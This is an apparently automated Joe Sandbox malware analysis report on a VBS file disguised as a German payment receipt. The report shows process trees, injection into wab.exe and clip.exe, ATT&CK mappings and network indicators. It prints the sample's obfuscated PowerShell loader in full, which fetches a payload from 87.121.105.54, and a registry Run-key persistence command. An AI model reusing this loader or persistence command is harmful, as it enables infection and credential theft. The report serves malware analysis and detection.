          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtReadFile: Direct from: 0x76F02ADC
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtQuerySystemInformation: Direct from: 0x1146E7F
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtDelayExecution: Direct from: 0x76F02DDC
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtResumeThread: Direct from: 0x76F02FBC
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | NtCreateUserProcess: Direct from: 0x76F0371C
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe protection: execute and read and write
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe | Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe protection: read write
          Source: C:\Windows\SysWOW64\clip.exe | Section loaded: NULL target: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\clip.exe | Thread APC queued: target process: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3010000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: CAFAF4
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. 
jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.baJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. 
jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.baJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vaterpassenes24.Acc && echo $"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)"
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
          Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match, File source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match, File source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
          Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
          Execution: 1 Windows Management Instrumentation; 1 Exploitation for Client Execution; 11 Command and Scripting Interpreter; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
          Persistence: 221 Scripting; 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
          Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 311 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
          Defense Evasion: 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 1 Modify Registry; 31 Virtualization/Sandbox Evasion; 311 Process Injection
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
          Discovery: 1 File and Directory Discovery; 14 System Information Discovery; 21 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; Network Sniffing
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
          Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
          Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
          [Behavior graph: ID 1436288; Sample: Zahlungsbeleg 202405029058.vbs; Startdate: 04/05/2024; Architecture: WINDOWS; Score: 100]

          Source | Detection | Scanner | Label | Link
          Zahlungsbeleg 202405029058.vbs | 0% | ReversingLabs | |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          bg.microsoft.map.fastly.net | 0% | Virustotal | | Browse
          Source | Detection | Scanner | Label | Link
          http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
          http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
          https://go.micro | 0% | URL Reputation | safe |
          https://contoso.com/ | 0% | URL Reputation | safe |
          https://contoso.com/License | 0% | URL Reputation | safe |
          https://contoso.com/Icon | 0% | URL Reputation | safe |
          https://contoso.com/Icon | 0% | URL Reputation | safe |
          http://87.121.105.54/Oxaluria209.smiP | 0% | Avira URL Cloud | safe |
          http://87.121.105.54 | 0% | Avira URL Cloud | safe |
          http://87.121.105.54/Oxaluria209.smi | 0% | Avira URL Cloud | safe |
          http://87.121.H | 0% | Avira URL Cloud | safe |
          http://87.121.105.54/vKdsOriqv105.bin | 0% | Avira URL Cloud | safe |
          http://87.121.105.54/Oxaluria209.smi | 0% | Virustotal | | Browse
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
          google.com | 142.250.72.174 | true | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          http://87.121.105.54/Oxaluria209.smi | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
          http://87.121.105.54/vKdsOriqv105.bin | false | Avira URL Cloud: safe | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://87.121.105.54/Oxaluria209.smiP | powershell.exe, 00000007.00000002.2596105612.000001A98C3A7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://87.121.105.54 | powershell.exe, 00000007.00000002.2596105612.000001A98C3A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2596105612.000001A98E1B0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
          http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://go.micro | powershell.exe, 00000007.00000002.2596105612.000001A98D62D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://contoso.com/ | powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://contoso.com/License | powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://contoso.com/Icon | powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
          https://aka.ms/pscore68 | powershell.exe, 00000007.00000002.2596105612.000001A98C181000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.2596105612.000001A98C181000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://87.121.H | powershell.exe, 00000007.00000002.2596105612.000001A98E1B0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                        142.250.72.174 | google.com | United States | | 15169 | GOOGLEUS | false
                        87.121.105.54 | unknown | Bulgaria | | 43561 | NET1-ASBG | false
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1436288
                        Start date and time:2024-05-04 09:50:36 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 53s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:24
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:2
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Zahlungsbeleg 202405029058.vbs
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winVBS@29/13@1/2
                        EGA Information:
                        • Successful, ratio: 40%
                        HCA Information:
                        • Successful, ratio: 77%
                        • Number of executed functions: 89
                        • Number of non-executed functions: 263
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 199.232.214.172, 52.168.117.173
                        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 7316 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7560 because it is empty
                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        Time | Type | Description
                        08:52:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)
                        08:52:31 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Tidsperioderne189% -w 1 $Yodellers23=(Get-ItemProperty -Path 'HKCU:\Lrlingekontrakten\').Propertyless;%Tidsperioderne189% ($Yodellers23)
                        09:51:28 | API Interceptor | 1x Sleep call for process: wscript.exe modified
                        09:51:36 | API Interceptor | 115x Sleep call for process: powershell.exe modified
                        09:53:09 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                        09:53:26 | API Interceptor | 7x Sleep call for process: clip.exe modified
                        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                        87.121.105.54 | 01105751.vbs | Get hash | malicious | FormBook, GuLoader | Browse | 87.121.105.54/iYbZIhIVLPBjJUzImyrJN72.bin
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.8393176096147916
                        Encrypted:false
